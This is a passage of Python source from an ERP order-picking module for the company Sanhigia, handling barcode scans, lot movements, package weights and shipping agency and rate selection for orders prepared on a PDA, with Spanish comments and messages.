-1\n\n response['data'] = {\n \"codbarras\": oParam['codbarras'],\n \"cantidad\": cantidad,\n \"idlinea\": val['param']['idlinea'],\n \"referencia\": val['param']['referencia']\n }\n\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"tipo\": 90,\n \"verbose_name\": \"Opts\",\n \"label\": \"Asignar lote\",\n \"style\": {\"width\": \"700px\"},\n \"key\": \"codlote\",\n \"validaciones\": None,\n \"opts\": opts\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"idlinea\",\n \"key\": \"idlinea\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"referencia\",\n \"key\": \"referencia\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n return True\n\n def sanhigia_pedidos_pedidoListoPDA(self, model, oParam):\n lineasServidas = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"COUNT(idlinea)\", \"idpedido = '{}' AND shcantalbaran is not null and shcantalbaran > 0\".format(model.idpedido))\n if not lineasServidas or lineasServidas == 0:\n resul = {}\n resul['status'] = -1\n resul['msg'] = \"No es posible completar no existen líneas para servir\"\n return resul\n if \"pesobultos\" not in oParam:\n valor = parseFloat(qsatype.FLUtil.sqlSelect(u\"articulos a INNER JOIN lineaspedidoscli l ON a.referencia = l.referencia \", u\"SUM(a.peso*l.shcantalbaran)\", \"l.idpedido = {}\".format(model.idpedido), u\"articulos,lineaspedidoscli\"))\n # valor = qsatype.FLUtil.roundFieldValue(valor, u\"albaranescli\", u\"peso\")\n if valor < 1:\n valor = 1\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": valor\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": True,\n \"validaciones\": None\n }\n ]\n return response\n elif \"codagencia\" not in oParam:\n # print(\"_______________BBBBBBBBBBBBBBBBBBBBBB_______________\")\n valor = parseFloat(qsatype.FLUtil.sqlSelect(u\"lineaspedidoscli\", u\"SUM((pvptotal / cantidad) * shcantalbaran)\", u\"idpedido = {} AND shcantalbaran > 0\".format(model.idpedido)))\n if oParam['canbultos'] is None:\n oParam['canbultos'] = 0\n codAgencia = qsatype.FLUtil.sqlSelect(u\"reglas_tarifa\", u\"codagencia\", u\"codpais = '{0}' AND provincias like '%''{1}''%' AND ({2} >= pesodesde and ({2} <= pesohasta or pesohasta IS NULL)) AND ({3} >= bultosdesde and ({3} <= bultoshasta or bultoshasta IS NULL)) AND ({4} >= importedesde and ({4} <= importehasta or importehasta IS NULL)) ORDER BY orden ASC\".format(model.codpais.codpais, model.idprovincia.idprovincia, oParam['pesobultos'], oParam['canbultos'], valor))\n if not codAgencia or codAgencia is None:\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos']\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True\n }\n ]\n return response\n else:\n tarifaDefecto = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(u\"codagencia = '{}'\".format(codAgencia))\n if not q.exec_():\n return False\n\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n tarifaDefecto = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(codAgencia))\n codzona = qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and codAgencia == \"CEX\":\n tarifaDefecto = \"82\"\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos'],\n \"codagencia\": codAgencia,\n \"Tarifa\": tarifaDefecto\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n elif \"Tarifa\" not in oParam:\n tarifaDefecto = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(u\"codagencia = '{}'\".format(oParam['codagencia']))\n if not q.exec_():\n return False\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n tarifaDefecto = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(oParam['codagencia']))\n codzona = qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and oParam['codagencia'] == \"CEX\":\n tarifaDefecto = \"82\"\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos'],\n \"codagencia\": oParam['codagencia'],\n \"Tarifa\": tarifaDefecto\n }\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 55,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True,\n \"visible\": False\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n else:\n if oParam['codagencia'] != qsatype.FLUtil.sqlSelect(u\"productosagtrans\", u\"codagencia\", u\"codproductoagt = '{}'\".format(oParam['Tarifa'])):\n codTarifa = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(oParam['codagencia']))\n codzona = qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and oParam['codagencia'] == \"CEX\":\n codTarifa = \"82\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(ustr(u\"codagencia = '{}'\".format(oParam['codagencia'])))\n if not q.exec_():\n return False\n\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos'],\n \"codagencia\": oParam['codagencia'],\n \"Tarifa\": codTarifa\n }\n response['title'] = \"Ha cambiado la agencia, seleccione una tarifa:\"\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 56,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True,\n \"visible\": False\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n curPedido = qsatype.FLSqlCursor(u\"pedidoscli\")\n curPedido.select(\"idpedido = {}\".format(model.idpedido))\n if not curPedido.first():\n raise ValueError(\"Error no se encuentra el pedido \")\n return False\n curPedido.setModeAccess(curPedido.Edit)\n curPedido.refreshBuffer()\n curPedido.setValueBuffer(\"pda\", 'Listo PDA')\n codtrabajador = curPedido.valueBuffer(\"codtrabajador\")\n if \"canbultos\" in oParam and \"pesobultos\" in oParam:\n curPedido.setValueBuffer(\"canbultos\", oParam['canbultos'])\n pesobulto = parseFloat(oParam['pesobultos']) / parseFloat(oParam['canbultos'])\n curPedido.setValueBuffer(\"pesobultos\", pesobulto)\n if \"codagencia\" in oParam:\n curPedido.setValueBuffer(\"codagencia\", oParam['codagencia'])\n if \"Tarifa\" in oParam:\n curPedido.setValueBuffer(\"codproductoagt\", oParam['Tarifa'])\n if not curPedido.commitBuffer():\n return False\n # Actualizar los datod de preparacion para todas las lineas del pedido\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'Pendiente' WHERE idpedido = {}\".format(model.idpedido)):\n return False\n\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_codtrabaprep = '{}' WHERE idpedido = {} AND sh_codtrabaprep IS NULL AND shcantalbaran > 0\".format(codtrabajador, model.idpedido)):\n raise ValueError(\"Error al actualizar el trabajador de las líneas\")\n return False\n return True\n\n def sanhigia_pedidos_actualizarDatosLineas(self, idpedido):\n curLineas = qsatype.FLSqlCursor(u\"lineaspedidoscli\")\n where = \"idpedido = {}\".format(idpedido)\n if not curLineas.select(where):\n return False\n while curLineas.next():\n curLineas.setModeAccess(curLineas.Edit)\n curLineas.refreshBuffer()\n cantidad = curLineas.valueBuffer(\"cantidad\")\n servida = curLineas.valueBuffer(\"totalenalbaran\")\n shcantalbaran = curLineas.valueBuffer(\"shcantalbaran\")\n if shcantalbaran is None:\n shcantalbaran = 0\n if cantidad <= (servida + shcantalbaran):\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"Todo\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Lista Envio\")\n elif shcantalbaran > 0:\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"Parcial\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Pendiente\")\n # curLineas.setNull(\"codpreparaciondepedido\")\n else:\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"No\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Pendiente\")\n # curLineas.setNull(\"codpreparaciondepedido\")\n if not curLineas.commitBuffer():\n return False\n return True\n\n def sanhigia_pedidos_initValidation(self, name, data):\n response = True\n if name == 'formRecord':\n codtrabajador = qsatype.FLUtil.sqlSelect(\"sh_trabajadores\", \"codtrabajador\", \"idusuario = '{}'\".format(qsatype.FLUtil.nameUser()))\n # user = sh_trabajadores.objects.get(nombre__iexact=qsatype.FLUtil.nameUser())\n if not data['DATA']['codtrabajador']:\n response = self.iface.asignarTrabajador(data['DATA']['idpedido'], codtrabajador)\n # Comentado por petición de Javier(Sanhigia) para que los pedidos se pueden gestionar y por usuario que no es el que lo ha creado\n # else:\n # if data['DATA']['codtrabajador'] == codtrabajador:\n # return True\n # else:\n # return False\n return response\n\n def sanhigia_pedidos_field_trabajador(self, model):\n nombre = \"\"\n if(model.codtrabajador):\n nombre = qsatype.FLUtil.sqlSelect(\"sh_trabajadores tr INNER JOIN pedidoscli p ON tr.codtrabajador = p.codtrabajador\", \"tr.nombre\", \"idpedido = {}\".format(model.idpedido))\n # user = sh_trabajadores.objects.get(codtrabajador__iexact=model.codtrabajador)\n # nombre = user.nombre\n return nombre\n\n def sanhigia_pedidos_field_descPreparacion(self, model):\n descPreparacion = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"lineaspedidoscli, pedidoscli, sh_preparaciondepedidos\")\n q.setSelect(u\"l.idlinea, pr.descripcion\")\n q.setFrom(u\"pedidoscli p INNER JOIN lineaspedidoscli l ON p.idpedido = l.idpedido INNER JOIN sh_preparaciondepedidos pr ON l.codpreparaciondepedido = pr.codpreparaciondepedido\")\n # q.setWhere(ustr(u\"p.idpedido = \", model.idpedido, \" GROUP BY pr.descripcion, p.idpedido\"))\n q.setWhere(u\"p.idpedido = {} GROUP BY pr.descripcion, l.idlinea\".format(model.idpedido))\n if not q.exec_():\n return descPreparacion\n if q.size() > 100:\n return descPreparacion\n\n descs = {}\n while q.next():\n if q.value(1):\n descs[q.value(1)] = True\n for d in descs:\n descPreparacion += \" \" + d\n return descPreparacion\n\n def sanhigia_pedidos_field_colorRow(self, model):\n estado = model.pda\n trabajador = model.codtrabajador\n if estado == \"Listo PDA\":\n return \"cSuccess\"\n elif estado == \"Albaranado\":\n return \"cDanger\"\n elif trabajador:\n return \"cWarning\"\n else:\n return None\n\n def sanhigia_pedidos_getForeignFields(self, model, template):\n if template == \"mastershpedidoscli\":\n return [\n {'verbose_name': 'rowColor', 'func': 'field_shpedidoscliQuerycolorRow'}\n ]\n return [\n {'verbose_name': 'Trabajador', 'func': 'field_trabajador'},\n {'verbose_name': 'Desc. preparación', 'func': 'field_descPreparacion'},\n {'verbose_name': 'rowColor', 'func': 'field_colorRow'}\n ]\n\n def sanhigia_pedidos_asignarTrabajador(self, idpedido, codtrabajador):\n curPedido = qsatype.FLSqlCursor(u\"pedidoscli\")\n curPedido.select(\"idpedido = {}\".format(idpedido))\n if not curPedido.first():\n raise ValueError(\"Error no se encuentra el pedido \")\n return False\n curPedido.setModeAccess(curPedido.Edit)\n curPedido.refreshBuffer()\n curPedido.setValueBuffer(\"codtrabajador\", codtrabajador)\n if not curPedido.commitBuffer():\n return False\n return True\n\n def sanhigia_pedidos_insertarMovilote(self, idLinea, referencia, cantidad, codAlmacen, codLote):\n resul = {}\n # print(\"idLinea\", idLinea, \"referencia\", referencia, \"cantidad\", cantidad, \"codAlmacen\", codAlmacen, \"codLote\", codLote)\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n # codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", ustr(u\"codigo = '\", codigo, u\"' AND enalmacen > 0 \"))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", u\"referencia = '{}' AND codalmacen = '{}'\".format(referencia, codAlmacen))\n if idStock == u\"\" or not idStock:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n cantidad = cantidad * -1\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n # print(\"______________\", idmovilote)\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}'\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n # print(\"no por aqui\", cantidad, idStock, codLote, idLinea)\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n # print(\"vamos a commit\", curMovilote.valueBuffer(\"codlote\"))\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n resul['resul'] = True\n return resul\n\n def sanhigia_pedidos_analizaCodBarras(self, idPedido, barcode, cantidad, codAlmacen, idlineapedido):\n '''\n 1. Comprobar si el barcode existe en alguna l?ea del pedido.\n 1.1. No existe --> Devuelvo Error.\n 2. Si existe.\n 2.1. El barcode NO es cuadrado\n 2.1.1. El barcode no va por lotes --> Actualizo cantidad de la l?ea. Devuelvo true.\n 2.1.2. El barcode va por lotes --> Devuelvo que va por lotes para mostrar formulario que elije lotes y debo de hacer otra llamada que inserte el lote y actualice cantidad\n 2.2. El barcode SI es cuadrado --> Tengo lote --> Inserto línea en movilote y devuelvo true.\n\n '''\n # print(\"analizacodbarras\", idlineapedido)\n # print(\"_______________________________________________\")\n referencia = \"\"\n idLinea = idlineapedido\n resul = {}\n # datos = qsatype.FactoriaModulos.get('formRecordarticulosprov').iface.datosLecturaCodBarras(barcode)\n datos = flfactalma_def.iface.datosLecturaCodBarras(barcode)\n qsatype.debug(datos)\n codBarras = datos['codbarras']\n\n # Ver si existe alguna referencia para ese c?igo de barras\n referencia = qsatype.FLUtil.sqlSelect(u\"articulosprov\", u\"referencia\", u\"codbarrasprov = '{}' AND referencia IN (select referencia from lineaspedidoscli where idpedido = {})\".format(codBarras, idPedido))\n if referencia:\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", u\"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in datos:\n datos['lote'] = None\n # Si no existe referencia compruebo si las lineas tienen codbarras\n if referencia == u\"\" or not referencia:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulosprov,lineaspedidoscli\")\n query.setSelect(u\"DISTINCT(articulosprov.referencia), lineaspedidoscli.descripcion\")\n # query.setSelect(u\"articulosprov.referencia, lineaspedidoscli.idlinea, lineaspedidoscli.descripcion\")\n query.setFrom(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia\")\n # query.setWhere(ustr(u\"articulosprov.codbarrasprov is null AND lineaspedidoscli.idpedido = \", idPedido))\n query.setWhere(u\"lineaspedidoscli.idpedido = {}\".format(idPedido))\n\n if query.exec_():\n if query.size() >= 1:\n resul['status'] = -1\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n resul['param'] = query\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No existe la referencia en el pedido\"\n resul['param'] = referencia\n return resul\n\n # Ver si existe m? de una referencia para el c?igo de barras pero filtramos ya por el pedido\n numReg = qsatype.FLUtil.sqlSelect(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia \", u\"count(distinct(articulosprov.referencia))\", u\"articulosprov.codbarrasprov = '{}' AND lineaspedidoscli.idpedido = {} GROUP BY articulosprov.referencia\".format(codBarras, idPedido))\n if not numReg:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulosprov,lineaspedidoscli\")\n query.setSelect(u\"DISTINCT(articulosprov.referencia), lineaspedidoscli.descripcion\")\n # query.setSelect(u\"articulosprov.referencia, lineaspedidoscli.idlinea, lineaspedidoscli.descripcion\")\n query.setFrom(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia\")\n # query.setWhere(ustr(u\"articulosprov.codbarrasprov is null AND lineaspedidoscli.idpedido = \", idPedido))\n query.setWhere(u\"lineaspedidoscli.idpedido = {}\".format(idPedido))\n\n if query.exec_():\n if query.size() >= 1:\n resul['status'] = -1\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n resul['param'] = query\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No existe la referencia en el pedido\"\n resul['param'] = referencia\n return resul\n\n if numReg > 1:\n resul['status'] = -3\n resul['msg'] = \"Hay más de una referencia para el código de barras\"\n resul['param'] = codBarras\n return resul\n # si existe solo una referencia para el código de barras que exista en el pedido , cogeremos esa\n if not idlineapedido:\n # print(\"no entra aqui?????\")\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli\")\n query.setSelect(u\"idlinea, referencia, cantidad, shcantalbaran\")\n query.setFrom(u\"lineaspedidoscli\")\n query.setWhere(u\"referencia = '{}' AND idpedido = {}\".format(referencia, idPedido))\n\n if query.exec_():\n if query.size() > 1:\n while query.next():\n # print(\" linea \", query.value(0), \" cantidad \", int(query.value(2)), \" oparam \", query.value(3), \" son iguales\", int(query.value(2)) == int(query.value(3) or 0))\n if int(query.value(2)) != int(query.value(3) or 0):\n referencia = query.value(1)\n idLinea = query.value(0)\n if not idLinea:\n # print(\"aqui al menos\")\n referencia = query.value(1)\n idLinea = query.value(0)\n if query.size() == 1:\n if query.next():\n referencia = query.value(1)\n idLinea = query.value(0)\n else:\n resul['status'] = -3\n resul['msg'] = \"Error inesperado\"\n return resul\n # 2.Existe\n # 2.1 no es cuadrado\n if datos['lote'] == u\"\" or not datos['lote']:\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", u\"referencia = '{}'\".format(referencia))\n if not porLotes:\n # 2.1.1 actualizo línea\n shcantidad = qsatype.FLUtil.sqlSelect(u\"lineaspedidoscli\", u\"shcantalbaran\", u\"idlinea = {}\".format(idLinea)) or 0\n shcantidad = shcantidad + 1\n if not qsatype.FLUtil.sqlUpdate(u\"lineaspedidoscli\", u\"shcantalbaran\", shcantidad, u\"idlinea = {}\".format(idLinea)):\n resul['status'] = -3\n resul['msg'] = \"Error al actualizar línea del pedido\"\n resul['param'] = idLinea\n return resul\n else:\n # 2.1.2 Va por lotes\n resul['status'] = -3\n resul['msg'] = \"Error inesperado\"\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lotes\")\n query.setSelect(u\"*\")\n query.setFrom(u\"lotes\")\n query.setWhere(u\"referencia = '{}' AND enalmacen > 0\".format(referencia))\n\n if query.exec_():\n # TODO\n if query.size() == 1:\n if query.next():\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", u\"referencia = '{}' AND codalmacen = '{}'\".format(referencia, codAlmacen))\n # print(\"aqui tengo que hacer el movimiento\", query.value(0))\n codLote = query.value(\"codlote\")\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n cantidad = cantidad * -1\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}'\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n else:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n else:\n return False\n if query.size() > 1:\n resul = {}\n resul['status'] = 2\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n oParam = {}\n oParam['referencia'] = referencia\n oParam['descripcion'] = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"descripcion\", u\"referencia = '{}'\".format(referencia))\n oParam['idlinea'] = idLinea\n oParam['query'] = query\n resul['param'] = oParam\n return resul\n else:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n return resul\n else:\n # 2.2 El barcode es cuadrado\n codigo = datos['lote']\n # print(\"por aqui ????_______________\")\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{}' and referencia = '{}'\".format(codigo, referencia))\n if not codLote:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lotes\")\n query.setSelect(u\"*\")\n query.setFrom(u\"lotes\")\n query.setWhere(u\"referencia = '{}' AND enalmacen > 0\".format(referencia))\n\n if query.exec_():\n if query.size() >= 1:\n resul = {}\n resul['status'] = 2\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n oParam = {}\n oParam['referencia'] = referencia\n oParam['descripcion'] = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"descripcion\", u\"referencia = '{}'\".format(referencia))\n oParam['idlinea'] = idLinea\n oParam['query'] = query\n resul['param'] = oParam\n return resul\n else:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{}' AND enalmacen > 0 and referencia = '{}'\".format(codigo, referencia))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No hay stock para este lote \"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", ustr(u\"referencia = '\", referencia, u\"' AND codalmacen = '\", codAlmacen, u\"'\"))\n if idStock == u\"\" or not idStock:\n resul['status'] = -1\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", ustr(u\"idlineapc = '\", idLinea, u\"' AND fecha = '\", hoy, u\"' AND codlote = '\" + codLote + \"' AND idlineaac is null\"))\n cantidad = cantidad * -1\n # print(idStock, \"idmovilote\", idmovilote, \"codlote\", codLote)\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '\" + str(idmovilote) + 